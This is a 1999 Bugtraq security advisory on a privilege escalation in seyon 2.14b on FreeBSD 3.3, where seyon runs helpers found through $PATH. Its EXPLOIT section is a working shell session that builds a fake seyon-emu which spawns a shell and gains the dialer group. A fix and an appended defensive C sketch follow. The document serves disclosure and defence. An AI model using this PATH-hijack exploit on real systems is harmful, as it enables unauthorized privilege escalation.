FreeBSD 3.3's seyon vulnerability


Date: Mon, 8 Nov 1999 20:50:38 MST
From: Brock Tellier <btellier@USA.NET.>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: FreeBSD 3.3's seyon vulnerability

Greetings,

In preparing for this advisory release, I checked for "seyon" vulnerabilities
in the bugtraq archives.  I found that the exploit I had developed had already
been discussed in May 1997.  However, this does not change the fact that the
current version of FreeBSD still ships a vulnerable version with vulnerable
privs.  I believe this is still worth noting.  Here is my advisory as it was
to be published before the previous vulnerability came to light.

OVERVIEW
A vulnerability exists in seyon v2.14b which will allow any user to upgrade
his or her privs to those with which seyon runs.

BACKGROUND
This advisory is based entirely off the work I've done on FreeBSD 3.3-RELEASE
and seyon 2.14b which is included on the FreeBSD installation CD as an
"additional package".  When installed via sysinstall, seyon's permissions are
sgid "dialer".  Different versions of seyon and different packages of 2.14b
may have different default permissions.

DETAILS
Upon startup, seyon executes the programs "seyon-emu" and "xterm".  The paths
to these programs are not absolute and are gotten from the user's $PATH.  By
adding a directory we have write access to in our $PATH and putting our own
version of seyon-emu or xterm, we can make seyon run this program with egid
dialer.  

EXPLOIT

bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD  3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999    
jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC  i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x  1 bin  dialer  88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
  setregid(getegid(), getegid());
  system("/usr/local/bin/bash");
}
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$ 

FIX
Simply chmod 750 `which seyon` and add selected users to the "dialer" group.

Brock Tellier
UNIX Administrator
Chicago, IL, USA
btellier@usa.net
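
Added example (not part of the original advisory and not seyon's own code): a C sketch of the code-level counterpart to the issue in DETAILS, showing an audit of $PATH for entries that resolve to the current directory, and a helper launch that uses an absolute path, the real gid and a fixed environment. The names unsafe_path_entries and run_helper are hypothetical, /bin/sh stands in for the helper, and it is assumed the helper does not need the set-gid group.

```c
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Count $PATH entries searched relative to the current directory: empty
 * entries (leading, trailing or doubled ':'), "." and any non-absolute one. */
int unsafe_path_entries(const char *path)
{
    int unsafe = 0;
    for (const char *p = path;; p += strcspn(p, ":") + 1) {
        size_t len = strcspn(p, ":");
        if (len == 0 || p[0] != '/')
            unsafe++;
        if (p[len] == '\0')
            break;
    }
    return unsafe;
}

/* Hypothetical launcher: absolute path only, set-gid group dropped in the
 * child, fixed environment. Returns the exit status, or -1 on refusal/error. */
int run_helper(const char *abs_path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    int status;

    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                      /* never fall back to a $PATH search */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setregid(getgid(), getgid()) != 0)  /* egid back to the real gid */
            _exit(126);
        execve(abs_path, argv, clean_env);
        _exit(127);                     /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    char *const argv[] = { "sh", "-c", "exit 0", NULL };
    printf("unsafe entries in .:/usr/bin: %d\n", unsafe_path_entries(".:/usr/bin"));
    return run_helper("/bin/sh", argv);
}
```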


